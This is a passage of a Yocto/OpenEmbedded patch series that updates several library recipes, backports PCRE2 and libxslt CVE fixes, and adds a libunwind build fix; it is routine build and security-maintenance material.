39 i = (int32_t)li;
40- if (i-- == 0)
41+ if (i-- <= 0)
42 {
43- fprintf(outfile, "** Zero repeat not allowed\n");
44+ fprintf(outfile, "** Zero or negative repeat not allowed\n");
45 return PR_OK;
46 }
47
48diff --git a/testdata/testinput2 b/testdata/testinput2
49index 655e519..14e00ed 100644
50--- a/testdata/testinput2
51+++ b/testdata/testinput2
52@@ -5772,4 +5772,7 @@ a)"xI
53 /(a)?a/I
54 manm
55
56+--
57+ \[X]{-10}
58+
59 # End of testinput2
60diff --git a/testdata/testoutput2 b/testdata/testoutput2
61index c733c12..958f246 100644
62--- a/testdata/testoutput2
63+++ b/testdata/testoutput2
64@@ -17435,6 +17435,10 @@ Subject length lower bound = 1
65 manm
66 0: a
67
68+--
69+ \[X]{-10}
70+** Zero or negative repeat not allowed
71+
72 # End of testinput2
73 Error -70: PCRE2_ERROR_BADDATA (unknown error number)
74 Error -62: bad serialized data
diff --git a/meta/recipes-support/libpcre/libpcre2_10.34.bb b/meta/recipes-support/libpcre/libpcre2_10.34.bb
index fa8655e027..53277270d2 100644
--- a/meta/recipes-support/libpcre/libpcre2_10.34.bb
+++ b/meta/recipes-support/libpcre/libpcre2_10.34.bb
@@ -10,8 +10,12 @@ SECTION = "devel"
10LICENSE = "BSD-3-Clause" 10LICENSE = "BSD-3-Clause"
11LIC_FILES_CHKSUM = "file://LICENCE;md5=b1588d3bb4cb0e1f5a597d908f8c5b37" 11LIC_FILES_CHKSUM = "file://LICENCE;md5=b1588d3bb4cb0e1f5a597d908f8c5b37"
12 12
13SRC_URI = "https://ftp.pcre.org/pub/pcre/pcre2-${PV}.tar.bz2 \ 13SRC_URI = "http://downloads.yoctoproject.org/mirror/sources/pcre2-${PV}.tar.bz2 \
14 file://pcre-cross.patch \ 14 file://pcre-cross.patch \
15 file://CVE-2022-1586.patch \
16 file://CVE-2022-1586-regression.patch \
17 file://CVE-2022-1587.patch \
18 file://CVE-2022-41409.patch \
15" 19"
16 20
17SRC_URI[md5sum] = "d280b62ded13f9ccf2fac16ee5286366" 21SRC_URI[md5sum] = "d280b62ded13f9ccf2fac16ee5286366"
diff --git a/meta/recipes-support/libpcre/libpcre_8.44.bb b/meta/recipes-support/libpcre/libpcre_8.44.bb
index e5471e81da..3267c5ad72 100644
--- a/meta/recipes-support/libpcre/libpcre_8.44.bb
+++ b/meta/recipes-support/libpcre/libpcre_8.44.bb
@@ -7,8 +7,7 @@ HOMEPAGE = "http://www.pcre.org"
7SECTION = "devel" 7SECTION = "devel"
8LICENSE = "BSD-3-Clause" 8LICENSE = "BSD-3-Clause"
9LIC_FILES_CHKSUM = "file://LICENCE;md5=3bb381a66a5385b246d4877922e7511e" 9LIC_FILES_CHKSUM = "file://LICENCE;md5=3bb381a66a5385b246d4877922e7511e"
10SRC_URI = "https://ftp.pcre.org/pub/pcre/pcre-${PV}.tar.bz2 \ 10SRC_URI = "${SOURCEFORGE_MIRROR}/pcre/pcre-${PV}.tar.bz2 \
11 file://fix-pcre-name-collision.patch \
12 file://run-ptest \ 11 file://run-ptest \
13 file://Makefile \ 12 file://Makefile \
14 " 13 "
diff --git a/meta/recipes-support/libproxy/libproxy_0.4.15.bb b/meta/recipes-support/libproxy/libproxy_0.4.15.bb
index 6f704d7a91..6c7d5a68a1 100644
--- a/meta/recipes-support/libproxy/libproxy_0.4.15.bb
+++ b/meta/recipes-support/libproxy/libproxy_0.4.15.bb
@@ -1,4 +1,8 @@
1SUMMARY = "Library providing automatic proxy configuration management" 1SUMMARY = "Library providing automatic proxy configuration management"
2DESCRIPTION = "libproxy provides interfaces to get the proxy that will be \
3used to access network resources. It uses various plugins to get proxy \
4configuration via different mechanisms (e.g. environment variables or \
5desktop settings)."
2HOMEPAGE = "https://github.com/libproxy/libproxy" 6HOMEPAGE = "https://github.com/libproxy/libproxy"
3BUGTRACKER = "https://github.com/libproxy/libproxy/issues" 7BUGTRACKER = "https://github.com/libproxy/libproxy/issues"
4SECTION = "libs" 8SECTION = "libs"
diff --git a/meta/recipes-support/libpsl/libpsl_0.21.0.bb b/meta/recipes-support/libpsl/libpsl_0.21.0.bb
index 9831b4b94f..66e64f785c 100644
--- a/meta/recipes-support/libpsl/libpsl_0.21.0.bb
+++ b/meta/recipes-support/libpsl/libpsl_0.21.0.bb
@@ -1,4 +1,10 @@
1SUMMARY = "Public Suffix List library" 1SUMMARY = "Public Suffix List library"
2DESCRIPTION = "The libpsl package provides a library for accessing and \
3resolving information from the Public Suffix List (PSL). The PSL is a set of \
4domain names beyond the standard suffixes, such as .com."
5
6HOMEPAGE = "https://rockdaboot.github.io/libpsl/"
7BUGTRACKER = "https://github.com/rockdaboot/libpsl/issues"
2 8
3LICENSE = "MIT" 9LICENSE = "MIT"
4LIC_FILES_CHKSUM = "file://LICENSE;md5=5437030d9e4fbe7267ced058ddb8a7f5 \ 10LIC_FILES_CHKSUM = "file://LICENSE;md5=5437030d9e4fbe7267ced058ddb8a7f5 \
@@ -13,11 +19,10 @@ SRC_URI[sha256sum] = "41bd1c75a375b85c337b59783f5deb93dbb443fb0a52d257f403df7bd6
13 19
14UPSTREAM_CHECK_URI = "https://github.com/rockdaboot/libpsl/releases" 20UPSTREAM_CHECK_URI = "https://github.com/rockdaboot/libpsl/releases"
15 21
16DEPENDS = "libidn2"
17
18inherit autotools gettext gtk-doc manpages pkgconfig lib_package 22inherit autotools gettext gtk-doc manpages pkgconfig lib_package
19 23
20PACKAGECONFIG ??= "" 24PACKAGECONFIG ?= "idn2"
21PACKAGECONFIG[manpages] = "--enable-man,--disable-man,libxslt-native" 25PACKAGECONFIG[manpages] = "--enable-man,--disable-man,libxslt-native"
22 26PACKAGECONFIG[icu] = "--enable-runtime=libicu --enable-builtin=libicu,,icu"
27PACKAGECONFIG[idn2] = "--enable-runtime=libidn2 --enable-builtin=libidn2,,libidn2 libunistring"
23BBCLASSEXTEND = "native nativesdk" 28BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-support/libsoup/libsoup-2.4_2.68.4.bb b/meta/recipes-support/libsoup/libsoup-2.4_2.68.4.bb
index f984a06aba..e42ac30bf2 100644
--- a/meta/recipes-support/libsoup/libsoup-2.4_2.68.4.bb
+++ b/meta/recipes-support/libsoup/libsoup-2.4_2.68.4.bb
@@ -1,11 +1,13 @@
1SUMMARY = "An HTTP library implementation in C" 1SUMMARY = "An HTTP library implementation in C"
2DESCRIPTION = "libsoup is an HTTP client/server library for GNOME. It uses GObjects \
3and the glib main loop, to integrate well with GNOME applications."
2HOMEPAGE = "https://wiki.gnome.org/Projects/libsoup" 4HOMEPAGE = "https://wiki.gnome.org/Projects/libsoup"
3BUGTRACKER = "https://bugzilla.gnome.org/" 5BUGTRACKER = "https://bugzilla.gnome.org/"
4SECTION = "x11/gnome/libs" 6SECTION = "x11/gnome/libs"
5LICENSE = "LGPLv2" 7LICENSE = "LGPLv2"
6LIC_FILES_CHKSUM = "file://COPYING;md5=5f30f0716dfdd0d91eb439ebec522ec2" 8LIC_FILES_CHKSUM = "file://COPYING;md5=5f30f0716dfdd0d91eb439ebec522ec2"
7 9
8DEPENDS = "glib-2.0 glib-2.0-native libxml2 sqlite3 intltool-native libpsl" 10DEPENDS = "glib-2.0 glib-2.0-native libxml2 sqlite3 libpsl"
9 11
10SHRT_VER = "${@d.getVar('PV').split('.')[0]}.${@d.getVar('PV').split('.')[1]}" 12SHRT_VER = "${@d.getVar('PV').split('.')[0]}.${@d.getVar('PV').split('.')[1]}"
11 13
diff --git a/meta/recipes-support/libunistring/libunistring_0.9.10.bb b/meta/recipes-support/libunistring/libunistring_0.9.10.bb
index 97fac4ecfa..2197b6656d 100644
--- a/meta/recipes-support/libunistring/libunistring_0.9.10.bb
+++ b/meta/recipes-support/libunistring/libunistring_0.9.10.bb
@@ -18,6 +18,7 @@ LIC_FILES_CHKSUM = "file://COPYING.LIB;md5=6a6a8e020838b23406c81b19c1d46df6 \
18 file://README;beginline=45;endline=65;md5=08287d16ba8d839faed8d2dc14d7d6a5 \ 18 file://README;beginline=45;endline=65;md5=08287d16ba8d839faed8d2dc14d7d6a5 \
19 file://doc/libunistring.texi;md5=287fa6075f78a3c85c1a52b0a92547cd \ 19 file://doc/libunistring.texi;md5=287fa6075f78a3c85c1a52b0a92547cd \
20 " 20 "
21DEPENDS = "gperf-native"
21 22
22SRC_URI = "${GNU_MIRROR}/libunistring/libunistring-${PV}.tar.gz \ 23SRC_URI = "${GNU_MIRROR}/libunistring/libunistring-${PV}.tar.gz \
23 file://iconv-m4-remove-the-test-to-convert-euc-jp.patch \ 24 file://iconv-m4-remove-the-test-to-convert-euc-jp.patch \
diff --git a/meta/recipes-support/libunwind/libunwind/0001-Fix-compilation-with-fno-common.patch b/meta/recipes-support/libunwind/libunwind/0001-Fix-compilation-with-fno-common.patch
new file mode 100644
index 0000000000..34a1f46b0f
--- /dev/null
+++ b/meta/recipes-support/libunwind/libunwind/0001-Fix-compilation-with-fno-common.patch
@@ -0,0 +1,420 @@
1From 51112447b316813ad1ae50ea66feca4eb755a424 Mon Sep 17 00:00:00 2001
2From: Yichao Yu <yyc1992@gmail.com>
3Date: Tue, 31 Mar 2020 00:43:32 -0400
4Subject: [PATCH] Fix compilation with -fno-common.
5
6[Khem Raj]
7Making all other archs consistent with IA64 which should not have this problem.
8Also move the FIXME to the correct place.
9
10Also add some minimum comments about this...
11
12[Philippe Coval]
13
14Patch ported to v1.3-stable branch,
15patch to be used used in openembedded-core dunfell branch (on v1.3.1)
16for oniro project.
17
18Upstream-Status: Backport [https://github.com/libunwind/libunwind/pull/166]
19Signed-off-by: Khem Raj <raj.khem@gmail.com>
20Thanks-to: Yichao Yu <yyc1992@gmail.com>
21Origin: https://github.com/libunwind/libunwind/commit/29e17d8d2ccbca07c423e3089a6d5ae8a1c9cb6e
22Relate-to: https://booting.oniroproject.org/distro/oniro/-/issues/191
23Forwarded: https://github.com/libunwind/libunwind/pull/312
24Last-Update: 2021-11-25
25Signed-off-by: Philippe Coval <philippe.coval@huawei.com>
26---
27 src/aarch64/Ginit.c | 15 +++++++--------
28 src/arm/Ginit.c | 15 +++++++--------
29 src/coredump/_UPT_get_dyn_info_list_addr.c | 5 +++++
30 src/hppa/Ginit.c | 15 +++++++--------
31 src/ia64/Ginit.c | 1 +
32 src/mi/Gfind_dynamic_proc_info.c | 1 +
33 src/mips/Ginit.c | 15 +++++++--------
34 src/ppc32/Ginit.c | 11 +++++++----
35 src/ppc64/Ginit.c | 11 +++++++----
36 src/ptrace/_UPT_get_dyn_info_list_addr.c | 5 +++++
37 src/sh/Ginit.c | 15 +++++++--------
38 src/tilegx/Ginit.c | 15 +++++++--------
39 src/x86/Ginit.c | 15 +++++++--------
40 src/x86_64/Ginit.c | 15 +++++++--------
41 14 files changed, 82 insertions(+), 72 deletions(-)
42
43diff --git a/src/aarch64/Ginit.c b/src/aarch64/Ginit.c
44index 9c4eae82..cb954b15 100644
45--- a/src/aarch64/Ginit.c
46+++ b/src/aarch64/Ginit.c
47@@ -61,13 +61,6 @@ tdep_uc_addr (ucontext_t *uc, int reg)
48
49 # endif /* UNW_LOCAL_ONLY */
50
51-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
52-
53-/* XXX fix me: there is currently no way to locate the dyn-info list
54- by a remote unwinder. On ia64, this is done via a special
55- unwind-table entry. Perhaps something similar can be done with
56- DWARF2 unwind info. */
57-
58 static void
59 put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
60 {
61@@ -78,7 +71,13 @@ static int
62 get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
63 void *arg)
64 {
65- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
66+#ifndef UNW_LOCAL_ONLY
67+# pragma weak _U_dyn_info_list_addr
68+ if (!_U_dyn_info_list_addr)
69+ return -UNW_ENOINFO;
70+#endif
71+ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
72+ *dyn_info_list_addr = _U_dyn_info_list_addr ();
73 return 0;
74 }
75
76diff --git a/src/arm/Ginit.c b/src/arm/Ginit.c
77index 2720d063..0bac0d72 100644
78--- a/src/arm/Ginit.c
79+++ b/src/arm/Ginit.c
80@@ -57,18 +57,17 @@ tdep_uc_addr (unw_tdep_context_t *uc, int reg)
81
82 # endif /* UNW_LOCAL_ONLY */
83
84-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
85-
86-/* XXX fix me: there is currently no way to locate the dyn-info list
87- by a remote unwinder. On ia64, this is done via a special
88- unwind-table entry. Perhaps something similar can be done with
89- DWARF2 unwind info. */
90-
91 static int
92 get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
93 void *arg)
94 {
95- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
96+#ifndef UNW_LOCAL_ONLY
97+# pragma weak _U_dyn_info_list_addr
98+ if (!_U_dyn_info_list_addr)
99+ return -UNW_ENOINFO;
100+#endif
101+ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
102+ *dyn_info_list_addr = _U_dyn_info_list_addr ();
103 return 0;
104 }
105
106diff --git a/src/coredump/_UPT_get_dyn_info_list_addr.c b/src/coredump/_UPT_get_dyn_info_list_addr.c
107index 0d119055..739ed056 100644
108--- a/src/coredump/_UPT_get_dyn_info_list_addr.c
109+++ b/src/coredump/_UPT_get_dyn_info_list_addr.c
110@@ -74,6 +74,11 @@ get_list_addr (unw_addr_space_t as, unw_word_t *dil_addr, void *arg,
111
112 #else
113
114+/* XXX fix me: there is currently no way to locate the dyn-info list
115+ by a remote unwinder. On ia64, this is done via a special
116+ unwind-table entry. Perhaps something similar can be done with
117+ DWARF2 unwind info. */
118+
119 static inline int
120 get_list_addr (unw_addr_space_t as, unw_word_t *dil_addr, void *arg,
121 int *countp)
122diff --git a/src/hppa/Ginit.c b/src/hppa/Ginit.c
123index 461e4b93..265455a6 100644
124--- a/src/hppa/Ginit.c
125+++ b/src/hppa/Ginit.c
126@@ -64,13 +64,6 @@ _Uhppa_uc_addr (ucontext_t *uc, int reg)
127
128 # endif /* UNW_LOCAL_ONLY */
129
130-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
131-
132-/* XXX fix me: there is currently no way to locate the dyn-info list
133- by a remote unwinder. On ia64, this is done via a special
134- unwind-table entry. Perhaps something similar can be done with
135- DWARF2 unwind info. */
136-
137 static void
138 put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
139 {
140@@ -81,7 +74,13 @@ static int
141 get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
142 void *arg)
143 {
144- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
145+#ifndef UNW_LOCAL_ONLY
146+# pragma weak _U_dyn_info_list_addr
147+ if (!_U_dyn_info_list_addr)
148+ return -UNW_ENOINFO;
149+#endif
150+ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
151+ *dyn_info_list_addr = _U_dyn_info_list_addr ();
152 return 0;
153 }
154
155diff --git a/src/ia64/Ginit.c b/src/ia64/Ginit.c
156index b09a2ad5..8601bb3c 100644
157--- a/src/ia64/Ginit.c
158+++ b/src/ia64/Ginit.c
159@@ -68,6 +68,7 @@ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
160 if (!_U_dyn_info_list_addr)
161 return -UNW_ENOINFO;
162 #endif
163+ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
164 *dyn_info_list_addr = _U_dyn_info_list_addr ();
165 return 0;
166 }
167diff --git a/src/mi/Gfind_dynamic_proc_info.c b/src/mi/Gfind_dynamic_proc_info.c
168index 98d35012..2e7c62e5 100644
169--- a/src/mi/Gfind_dynamic_proc_info.c
170+++ b/src/mi/Gfind_dynamic_proc_info.c
171@@ -49,6 +49,7 @@ local_find_proc_info (unw_addr_space_t as, unw_word_t ip, unw_proc_info_t *pi,
172 return -UNW_ENOINFO;
173 #endif
174
175+ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
176 list = (unw_dyn_info_list_t *) (uintptr_t) _U_dyn_info_list_addr ();
177 for (di = list->first; di; di = di->next)
178 if (ip >= di->start_ip && ip < di->end_ip)
179diff --git a/src/mips/Ginit.c b/src/mips/Ginit.c
180index 3df170c7..bf7a8f5a 100644
181--- a/src/mips/Ginit.c
182+++ b/src/mips/Ginit.c
183@@ -69,13 +69,6 @@ tdep_uc_addr (ucontext_t *uc, int reg)
184
185 # endif /* UNW_LOCAL_ONLY */
186
187-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
188-
189-/* XXX fix me: there is currently no way to locate the dyn-info list
190- by a remote unwinder. On ia64, this is done via a special
191- unwind-table entry. Perhaps something similar can be done with
192- DWARF2 unwind info. */
193-
194 static void
195 put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
196 {
197@@ -86,7 +79,13 @@ static int
198 get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
199 void *arg)
200 {
201- *dyn_info_list_addr = (unw_word_t) (intptr_t) &_U_dyn_info_list;
202+#ifndef UNW_LOCAL_ONLY
203+# pragma weak _U_dyn_info_list_addr
204+ if (!_U_dyn_info_list_addr)
205+ return -UNW_ENOINFO;
206+#endif
207+ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
208+ *dyn_info_list_addr = _U_dyn_info_list_addr ();
209 return 0;
210 }
211
212diff --git a/src/ppc32/Ginit.c b/src/ppc32/Ginit.c
213index ba302448..7b454558 100644
214--- a/src/ppc32/Ginit.c
215+++ b/src/ppc32/Ginit.c
216@@ -91,9 +91,6 @@ tdep_uc_addr (ucontext_t *uc, int reg)
217
218 # endif /* UNW_LOCAL_ONLY */
219
220-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
221-
222-
223 static void
224 put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
225 {
226@@ -104,7 +101,13 @@ static int
227 get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
228 void *arg)
229 {
230- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
231+#ifndef UNW_LOCAL_ONLY
232+# pragma weak _U_dyn_info_list_addr
233+ if (!_U_dyn_info_list_addr)
234+ return -UNW_ENOINFO;
235+#endif
236+ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
237+ *dyn_info_list_addr = _U_dyn_info_list_addr ();
238 return 0;
239 }
240
241diff --git a/src/ppc64/Ginit.c b/src/ppc64/Ginit.c
242index 4c88cd6e..7bfb395a 100644
243--- a/src/ppc64/Ginit.c
244+++ b/src/ppc64/Ginit.c
245@@ -95,9 +95,6 @@ tdep_uc_addr (ucontext_t *uc, int reg)
246
247 # endif /* UNW_LOCAL_ONLY */
248
249-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
250-
251-
252 static void
253 put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
254 {
255@@ -108,7 +105,13 @@ static int
256 get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
257 void *arg)
258 {
259- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
260+#ifndef UNW_LOCAL_ONLY
261+# pragma weak _U_dyn_info_list_addr
262+ if (!_U_dyn_info_list_addr)
263+ return -UNW_ENOINFO;
264+#endif
265+ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
266+ *dyn_info_list_addr = _U_dyn_info_list_addr ();
267 return 0;
268 }
269
270diff --git a/src/ptrace/_UPT_get_dyn_info_list_addr.c b/src/ptrace/_UPT_get_dyn_info_list_addr.c
271index cc5ed044..16671d45 100644
272--- a/src/ptrace/_UPT_get_dyn_info_list_addr.c
273+++ b/src/ptrace/_UPT_get_dyn_info_list_addr.c
274@@ -71,6 +71,11 @@ get_list_addr (unw_addr_space_t as, unw_word_t *dil_addr, void *arg,
275
276 #else
277
278+/* XXX fix me: there is currently no way to locate the dyn-info list
279+ by a remote unwinder. On ia64, this is done via a special
280+ unwind-table entry. Perhaps something similar can be done with
281+ DWARF2 unwind info. */
282+
283 static inline int
284 get_list_addr (unw_addr_space_t as, unw_word_t *dil_addr, void *arg,
285 int *countp)
286diff --git a/src/sh/Ginit.c b/src/sh/Ginit.c
287index 52988a72..9fe96d2b 100644
288--- a/src/sh/Ginit.c
289+++ b/src/sh/Ginit.c
290@@ -58,13 +58,6 @@ tdep_uc_addr (ucontext_t *uc, int reg)
291
292 # endif /* UNW_LOCAL_ONLY */
293
294-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
295-
296-/* XXX fix me: there is currently no way to locate the dyn-info list
297- by a remote unwinder. On ia64, this is done via a special
298- unwind-table entry. Perhaps something similar can be done with
299- DWARF2 unwind info. */
300-
301 static void
302 put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
303 {
304@@ -75,7 +68,13 @@ static int
305 get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
306 void *arg)
307 {
308- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
309+#ifndef UNW_LOCAL_ONLY
310+# pragma weak _U_dyn_info_list_addr
311+ if (!_U_dyn_info_list_addr)
312+ return -UNW_ENOINFO;
313+#endif
314+ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
315+ *dyn_info_list_addr = _U_dyn_info_list_addr ();
316 return 0;
317 }
318
319diff --git a/src/tilegx/Ginit.c b/src/tilegx/Ginit.c
320index 7564a558..925e6413 100644
321--- a/src/tilegx/Ginit.c
322+++ b/src/tilegx/Ginit.c
323@@ -64,13 +64,6 @@ tdep_uc_addr (ucontext_t *uc, int reg)
324
325 # endif /* UNW_LOCAL_ONLY */
326
327-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
328-
329-/* XXX fix me: there is currently no way to locate the dyn-info list
330- by a remote unwinder. On ia64, this is done via a special
331- unwind-table entry. Perhaps something similar can be done with
332- DWARF2 unwind info. */
333-
334 static void
335 put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
336 {
337@@ -81,7 +74,13 @@ static int
338 get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
339 void *arg)
340 {
341- *dyn_info_list_addr = (unw_word_t) (intptr_t) &_U_dyn_info_list;
342+#ifndef UNW_LOCAL_ONLY
343+# pragma weak _U_dyn_info_list_addr
344+ if (!_U_dyn_info_list_addr)
345+ return -UNW_ENOINFO;
346+#endif
347+ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
348+ *dyn_info_list_addr = _U_dyn_info_list_addr ();
349 return 0;
350 }
351
352diff --git a/src/x86/Ginit.c b/src/x86/Ginit.c
353index f6b8dc27..3cec74a2 100644
354--- a/src/x86/Ginit.c
355+++ b/src/x86/Ginit.c
356@@ -54,13 +54,6 @@ tdep_uc_addr (ucontext_t *uc, int reg)
357
358 # endif /* UNW_LOCAL_ONLY */
359
360-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
361-
362-/* XXX fix me: there is currently no way to locate the dyn-info list
363- by a remote unwinder. On ia64, this is done via a special
364- unwind-table entry. Perhaps something similar can be done with
365- DWARF2 unwind info. */
366-
367 static void
368 put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
369 {
370@@ -71,7 +64,13 @@ static int
371 get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
372 void *arg)
373 {
374- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
375+#ifndef UNW_LOCAL_ONLY
376+# pragma weak _U_dyn_info_list_addr
377+ if (!_U_dyn_info_list_addr)
378+ return -UNW_ENOINFO;
379+#endif
380+ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
381+ *dyn_info_list_addr = _U_dyn_info_list_addr ();
382 return 0;
383 }
384
385diff --git a/src/x86_64/Ginit.c b/src/x86_64/Ginit.c
386index b7e8e462..fe6bcc33 100644
387--- a/src/x86_64/Ginit.c
388+++ b/src/x86_64/Ginit.c
389@@ -49,13 +49,6 @@ static struct unw_addr_space local_addr_space;
390
391 unw_addr_space_t unw_local_addr_space = &local_addr_space;
392
393-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
394-
395-/* XXX fix me: there is currently no way to locate the dyn-info list
396- by a remote unwinder. On ia64, this is done via a special
397- unwind-table entry. Perhaps something similar can be done with
398- DWARF2 unwind info. */
399-
400 static void
401 put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
402 {
403@@ -66,7 +59,13 @@ static int
404 get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
405 void *arg)
406 {
407- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
408+#ifndef UNW_LOCAL_ONLY
409+# pragma weak _U_dyn_info_list_addr
410+ if (!_U_dyn_info_list_addr)
411+ return -UNW_ENOINFO;
412+#endif
413+ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
414+ *dyn_info_list_addr = _U_dyn_info_list_addr ();
415 return 0;
416 }
417
418--
4192.32.0
420
diff --git a/meta/recipes-support/libunwind/libunwind_1.3.1.bb b/meta/recipes-support/libunwind/libunwind_1.3.1.bb
index 037e04c3c0..8ae94a834c 100644
--- a/meta/recipes-support/libunwind/libunwind_1.3.1.bb
+++ b/meta/recipes-support/libunwind/libunwind_1.3.1.bb
@@ -7,6 +7,7 @@ SRC_URI = "http://download.savannah.nongnu.org/releases/libunwind/libunwind-${PV
7 file://0004-Fix-build-on-mips-musl.patch \ 7 file://0004-Fix-build-on-mips-musl.patch \
8 file://0005-ppc32-Consider-ucontext-mismatches-between-glibc-and.patch \ 8 file://0005-ppc32-Consider-ucontext-mismatches-between-glibc-and.patch \
9 file://0006-Fix-for-X32.patch \ 9 file://0006-Fix-for-X32.patch \
10 file://0001-Fix-compilation-with-fno-common.patch \
10 " 11 "
11SRC_URI_append_libc-musl = " file://musl-header-conflict.patch" 12SRC_URI_append_libc-musl = " file://musl-header-conflict.patch"
12 13
diff --git a/meta/recipes-support/liburcu/liburcu_0.11.1.bb b/meta/recipes-support/liburcu/liburcu_0.11.1.bb
index 6a517e6f29..1902415c90 100644
--- a/meta/recipes-support/liburcu/liburcu_0.11.1.bb
+++ b/meta/recipes-support/liburcu/liburcu_0.11.1.bb
@@ -1,4 +1,7 @@
1SUMMARY = "Userspace RCU (read-copy-update) library" 1SUMMARY = "Userspace RCU (read-copy-update) library"
2DESCRIPTION = "A userspace RCU (read-copy-update) library. This data \
3synchronization library provides read-side access which scales linearly \
4with the number of cores. "
2HOMEPAGE = "http://lttng.org/urcu" 5HOMEPAGE = "http://lttng.org/urcu"
3BUGTRACKER = "http://lttng.org/project/issues" 6BUGTRACKER = "http://lttng.org/project/issues"
4 7
diff --git a/meta/recipes-support/libusb/libusb1_1.0.22.bb b/meta/recipes-support/libusb/libusb1_1.0.22.bb
index 1d9d772575..ffa8f0320c 100644
--- a/meta/recipes-support/libusb/libusb1_1.0.22.bb
+++ b/meta/recipes-support/libusb/libusb1_1.0.22.bb
@@ -1,5 +1,7 @@
1SUMMARY = "Userspace library to access USB (version 1.0)" 1SUMMARY = "Userspace library to access USB (version 1.0)"
2HOMEPAGE = "http://libusb.sf.net" 2DESCRIPTION = "A cross-platform library to access USB devices from Linux, \
3macOS, Windows, OpenBSD/NetBSD, Haiku and Solaris userspace."
4HOMEPAGE = "https://libusb.info"
3BUGTRACKER = "http://www.libusb.org/report" 5BUGTRACKER = "http://www.libusb.org/report"
4SECTION = "libs" 6SECTION = "libs"
5 7
@@ -8,7 +10,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=fbc093901857fcd118f065f900982c24"
8 10
9BBCLASSEXTEND = "native nativesdk" 11BBCLASSEXTEND = "native nativesdk"
10 12
11SRC_URI = "${SOURCEFORGE_MIRROR}/libusb/libusb-${PV}.tar.bz2 \ 13SRC_URI = "https://github.com/libusb/libusb/releases/download/v${PV}/libusb-${PV}.tar.bz2 \
12 file://no-dll.patch \ 14 file://no-dll.patch \
13 file://run-ptest \ 15 file://run-ptest \
14 " 16 "
diff --git a/meta/recipes-support/libxslt/libxslt/CVE-2021-30560.patch b/meta/recipes-support/libxslt/libxslt/CVE-2021-30560.patch
new file mode 100644
index 0000000000..614047ea7a
--- /dev/null
+++ b/meta/recipes-support/libxslt/libxslt/CVE-2021-30560.patch
@@ -0,0 +1,201 @@
1From 50f9c9cd3b7dfe9b3c8c795247752d1fdcadcac8 Mon Sep 17 00:00:00 2001
2From: Nick Wellnhofer <wellnhofer@aevum.de>
3Date: Sat, 12 Jun 2021 20:02:53 +0200
4Subject: [PATCH] Fix use-after-free in xsltApplyTemplates
5
6xsltApplyTemplates without a select expression could delete nodes in
7the source document.
8
91. Text nodes with strippable whitespace
10
11Whitespace from input documents is already stripped, so there's no
12need to strip it again. Under certain circumstances, xsltApplyTemplates
13could be fooled into deleting text nodes that are still referenced,
14resulting in a use-after-free.
15
162. The DTD
17
18The DTD was only unlinked, but there's no good reason to do this just
19now. Maybe it was meant as a micro-optimization.
20
213. Unknown nodes
22
23Useless and dangerous as well, especially with XInclude nodes.
24See https://gitlab.gnome.org/GNOME/libxml2/-/issues/268
25
26Simply stop trying to uselessly delete nodes when applying a template.
27This part of the code is probably a leftover from a time where
